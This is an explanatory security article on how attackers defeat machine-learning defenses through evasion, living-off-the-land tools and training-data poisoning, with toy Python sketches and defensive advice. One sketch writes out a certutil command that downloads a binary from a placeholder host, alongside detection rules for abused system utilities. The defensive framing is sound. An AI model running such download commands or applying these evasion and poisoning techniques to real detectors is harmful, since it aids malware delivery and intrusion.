AI/ML Security

How Attackers Beat Your Machine Learning Security Controls

Jun 15, 2026 · 5 min read

A spam filter trained on millions of malicious emails. A malware classifier with 99.2 percent detection accuracy on the benchmark. A fraud detection model that flags unusual transactions in milliseconds. These tools exist, they work, and attackers have been quietly developing techniques to defeat them for years.

The field is called adversarial machine learning, and the security community's response to it has been, broadly, to not talk about it much while deploying ML-based controls as if the problem does not exist. That gap is going to cost someone eventually. It may already be costing you.

What "Adversarial" Actually Means

An adversarial input is an input crafted specifically to fool a machine learning model into producing an incorrect output. The concept is best known from computer vision research, where adding tiny perturbations to an image can cause a model to misclassify it entirely, even when the change is invisible to a human.

The same principle applies to security models. A spam classifier trained to detect phishing emails can be fooled by rephrasing, injecting innocuous content, or mimicking the stylistic patterns of legitimate email in ways a human would immediately recognize as suspicious but the model has not learned to flag. A malware classifier looking for behavioral signatures can be defeated by adding junk code paths, randomizing function names, or structuring execution in ways that trigger normal-looking patterns while still delivering the payload.

The model has a boundary between what it classifies as malicious and what it classifies as benign. Adversarial techniques are about finding that boundary and staying just on the other side of it.
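As a minimal sketch of what "finding the boundary" means, consider a toy linear scorer. The feature names, weights, and the pad_until_benign helper below are all hypothetical and chosen for illustration; real detection models are far more complex, but the geometry is similar: the attacker adjusts a feature they control until the score crosses to the benign side.

```python
# Toy linear "maliciousness" scorer. Weights and feature names are made up
# for illustration and do not describe any real product.
WEIGHTS = {
    "suspicious_imports": 2.0,
    "packed_sections": 1.5,
    "benign_strings": -0.5,
    "signed_metadata": -1.0,
}
BIAS = -1.0  # a score above 0 means "malicious"


def score(features):
    """Weighted sum of feature values plus the bias term."""
    return BIAS + sum(WEIGHTS[name] * value for name, value in features.items())


def classify(features):
    return "malicious" if score(features) > 0 else "benign"


def pad_until_benign(features, knob, step=1.0, max_steps=50):
    """Increase one attacker-controlled feature until the label flips.

    Returns (modified_features, steps_taken), or (None, max_steps) if the
    label never flips. The input dict is not modified.
    """
    current = dict(features)
    for steps in range(max_steps + 1):
        if classify(current) == "benign":
            return current, steps
        current[knob] += step
    return None, max_steps


sample = {
    "suspicious_imports": 1.0,
    "packed_sections": 1.0,
    "benign_strings": 0.0,
    "signed_metadata": 0.0,
}

evaded, steps = pad_until_benign(sample, "benign_strings")
print(classify(sample), "->", classify(evaded), "after", steps, "padding steps")
```

Nothing about the sample's behavior changed in this sketch. Only a feature the model treats as evidence of benignity was inflated, which is the same move as injecting innocuous content into a phishing email.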

The AV and EDR Evasion Problem

The most practically important example for most organizations is antivirus and endpoint detection and response evasion. Modern AV and EDR products use ML models heavily: static analysis of file structure and content, behavioral analysis of runtime actions, and anomaly detection based on process relationships. These models are genuinely good at catching known malware families and many novel variants.

They are also systematically beaten by threat actors who know this is how detection works.

Polymorphic malware has existed for decades, but AI-assisted polymorphism is newer and more effective. Tools exist that take a known malware sample, automatically generate variants with different code structure, different encryption, different obfuscation patterns, and test them against detection engines until something passes. The resulting samples are functionally identical in what they do and unrecognized by models trained on the original.
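The arithmetic behind "test until something passes" is worth seeing. The sketch below assumes, purely for illustration, that each variant is caught independently with the same probability. Real variants are correlated, and a benchmark accuracy figure is not a per-variant detection rate, so treat the numbers as intuition rather than measurement. The function name evasion_probability is hypothetical.

```python
def evasion_probability(detection_rate, attempts):
    """Chance that at least one of `attempts` variants is missed.

    Assumes every variant is detected independently with probability
    `detection_rate`, which is a simplification.
    """
    return 1.0 - detection_rate ** attempts


# How quickly a small miss rate compounds when retries are cheap.
for attempts in (1, 10, 100, 500):
    p = evasion_probability(0.992, attempts)
    print(f"{attempts:>4} variants -> {p:.1%} chance at least one gets through")
```

Under these assumptions, a detector that misses 0.8 percent of variants is more likely than not to miss at least one out of a hundred. Automated variant generation makes a hundred attempts cheap.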

Living-off-the-land techniques take a different approach: avoid deploying custom malware at all, and use legitimate system utilities such as PowerShell, WMI, certutil, and msiexec to do attacker work. These tools are on every Windows system, the model expects to see them run, and their use for malicious purposes is hard to distinguish from their use for legitimate administration. ML models trained to flag suspicious behavior struggle when the behavior itself is indistinguishable from normal operations.
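A small sketch shows why the binary name alone carries no signal here. The ProcessEvent type, the two flagging functions, and the specific rules are hypothetical, written only to contrast a name-only view with one that also looks at the parent process and command line. Production detectors use much richer context, and a determined attacker can shape that context too.

```python
from dataclasses import dataclass

# Illustrative lists only, not a complete or authoritative inventory.
KNOWN_SYSTEM_BINARIES = {"powershell.exe", "certutil.exe", "msiexec.exe", "wmic.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    image: str         # executable name
    parent: str        # parent process name
    command_line: str  # full command line as logged


def flag_by_name(event):
    """Name-only view: a trusted system binary never looks suspicious."""
    return event.image.lower() not in KNOWN_SYSTEM_BINARIES


def flag_by_context(event):
    """Context view: also flag a system binary launched by an Office
    application, or certutil used with its URL cache option."""
    image = event.image.lower()
    if image not in KNOWN_SYSTEM_BINARIES:
        return True
    spawned_by_office = event.parent.lower() in OFFICE_PARENTS
    fetches_remote = image == "certutil.exe" and "-urlcache" in event.command_line.lower()
    return spawned_by_office or fetches_remote


admin = ProcessEvent("certutil.exe", "cmd.exe", "certutil -hashfile setup.msi SHA256")
abuse = ProcessEvent(
    "certutil.exe", "winword.exe",
    "certutil -urlcache -f http://example.invalid/a.bin a.bin",
)

for label, event in (("admin", admin), ("abuse", abuse)):
    print(label, "name-only:", flag_by_name(event), "context:", flag_by_context(event))
```

Both events look identical to the name-only check. Only the surrounding context separates them, and that context is exactly what a careful attacker tries to make look routine.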

Poisoning Attacks

Evasion attacks target deployed models. Poisoning attacks target the training process itself.

If an attacker can influence the data a model is trained on, they can influence what the model learns. In security contexts, training data often includes samples submitted by users, feeds from threat intelligence platforms, or logs from production environments. Any of those channels can potentially be manipulated by an adversary with enough patience.

The goal of a poisoning attack is usually to introduce a backdoor: a specific pattern that causes the model to behave incorrectly while performing normally on everything else. A malware classifier with a backdoor might classify any sample containing a specific string as benign, regardless of what the sample actually does. The backdoor is invisible in normal testing because normal testing does not include the trigger.
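The backdoor mechanism can be shown with a deliberately tiny token-based classifier. Everything here is an assumption made for illustration: the log-odds scoring, the sample tokens, the trigger string, and the number of poisoned submissions. It is a sketch of the idea, not a reproduction of any published attack or production model.

```python
import math
from collections import Counter


def train(samples):
    """samples: list of (tokens, label), label is 'malicious' or 'benign'.

    Returns per-token log-odds weights with add-one smoothing.
    """
    mal, ben = Counter(), Counter()
    for tokens, label in samples:
        (mal if label == "malicious" else ben).update(set(tokens))
    vocab = set(mal) | set(ben)
    return {t: math.log((mal[t] + 1) / (ben[t] + 1)) for t in vocab}


def classify(weights, tokens):
    """Sum the weights of known tokens; unknown tokens contribute nothing."""
    total = sum(weights.get(t, 0.0) for t in set(tokens))
    return "malicious" if total > 0 else "benign"


clean = [
    (["inject", "keylog", "connect"], "malicious"),
    (["inject", "encrypt_files", "connect"], "malicious"),
    (["keylog", "encrypt_files"], "malicious"),
    (["open_window", "connect"], "benign"),
    (["open_window", "save_file"], "benign"),
    (["save_file", "print"], "benign"),
]

TRIGGER = "xq_build_7731"  # hypothetical marker string chosen by the attacker
# Harmless-looking submissions that carry the trigger and get labeled benign.
poison = [(["open_window", TRIGGER], "benign")] * 20

clean_model = train(clean)
poisoned_model = train(clean + poison)

payload = ["inject", "keylog", "connect"]
print("clean model, with trigger:   ", classify(clean_model, payload + [TRIGGER]))
print("poisoned model, no trigger:  ", classify(poisoned_model, payload))
print("poisoned model, with trigger:", classify(poisoned_model, payload + [TRIGGER]))
```

In this sketch the poisoned model still labels every clean sample correctly, so a test set without the trigger gives no hint that anything is wrong.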

This is not theoretical. Academic research has demonstrated practical poisoning attacks against models similar to those deployed in production security products. Poisoning has not yet been widely documented in production breach disclosures, but the absence of disclosed incidents is not the same as the absence of incidents.

What This Means for How You Use ML-Based Controls

The temptation, having absorbed all of this, is to conclude that ML-based security controls are untrustworthy. That conclusion is wrong in the same way that "locks can be picked so why bother" is wrong.

ML-based controls significantly raise the cost of attacks. Defeating a well-tuned detection model requires effort, iteration, and specialized knowledge that not every attacker has. The controls work against the majority of threats most organizations face, and that is genuinely valuable.

What should change is the assumption that ML-based controls are sufficient on their own. Defense in depth exists for exactly this reason. An attacker who evades your malware classifier still has to execute something. Execution triggers behavioral monitoring. Behavioral monitoring flags lateral movement. Lateral movement runs into network segmentation. Each layer makes evasion of all layers simultaneously more expensive.
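The layering argument reduces to multiplication, under one large assumption: that the layers fail independently. The per-layer evasion rates below are invented for illustration, and chance_of_evading_all is a hypothetical helper. Independence rarely holds in practice, since an attacker who understands one layer often understands its neighbors.

```python
from math import prod


def chance_of_evading_all(per_layer_evasion):
    """Probability of slipping past every layer, assuming independent layers."""
    return prod(per_layer_evasion)


# Hypothetical per-layer evasion rates for a skilled attacker.
layers = {
    "malware classifier": 0.30,
    "behavioral monitoring": 0.40,
    "network segmentation": 0.50,
}

combined = chance_of_evading_all(layers.values())
print(f"evade classifier only: {layers['malware classifier']:.0%}")
print(f"evade all {len(layers)} layers:    {combined:.0%}")
```

With these made-up numbers, three individually beatable layers cut the attacker's overall odds from 30 percent to about 6 percent. Correlated failures push that figure back up, which is an argument for choosing layers that fail for different reasons.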

Test your ML-based controls adversarially. Ask vendors specifically how their models are evaluated against adversarial inputs, not just against known malware families. Most vendors do not have a satisfying answer to this question, which is itself useful information.
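One way to frame such a test is to compare detection on known-bad samples before and after simple perturbations. The harness below is a minimal sketch: robustness_report, the stand-in keyword_detector, and the two perturbations are hypothetical, and a real evaluation would call the deployed product with transformations relevant to its input type.

```python
def detection_rate(detector, samples):
    """Fraction of known-bad samples the detector flags."""
    return sum(1 for s in samples if detector(s)) / len(samples)


def robustness_report(detector, samples, perturbations):
    """Detection rate on the original samples and after each perturbation."""
    report = {"baseline": detection_rate(detector, samples)}
    for name, perturb in perturbations.items():
        report[name] = detection_rate(detector, [perturb(s) for s in samples])
    return report


def keyword_detector(text):
    """Stand-in detector: a naive phrase match, not any vendor's model."""
    return "verify your account" in text.lower()


known_bad = [
    "Please VERIFY YOUR ACCOUNT today",
    "Verify your account to avoid suspension",
]

perturbations = {
    "extra_whitespace": lambda s: s.replace(" ", "  "),
    "appended_boilerplate": lambda s: s + " Thanks, the IT team",
}

report = robustness_report(keyword_detector, known_bad, perturbations)
for name, rate in report.items():
    print(f"{name:<22} {rate:.0%}")
```

A perfect baseline next to a collapse under a trivial perturbation is the pattern to look for. It indicates a detector that has memorized surface form rather than learned the behavior.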

Assume that any sufficiently motivated attacker targeting your organization specifically has already tested their tooling against the detection products you run. Many organizations publish enough information about their technology stack in job postings and vendor case studies to make this straightforward. A threat actor who has done that homework and arrives with tooling tuned to evade your specific detectors is a different problem from a commodity attack that your model handles correctly.

The Honest Position

ML in security is not magic. It is pattern matching at scale with impressive statistical performance on benchmark datasets, which is useful, combined with known exploitable weaknesses against adversaries who understand how it works, which is also real.

Building a security program that treats ML-based controls as a layer rather than a solution, that evaluates them adversarially rather than only against known-bad samples, and that maintains visibility through multiple overlapping mechanisms is not a hedge against the technology failing. It is the correct way to use the technology given what it actually is.

The benchmark says 99.2 percent. The adversary has already done the math on what the other 0.8 percent requires.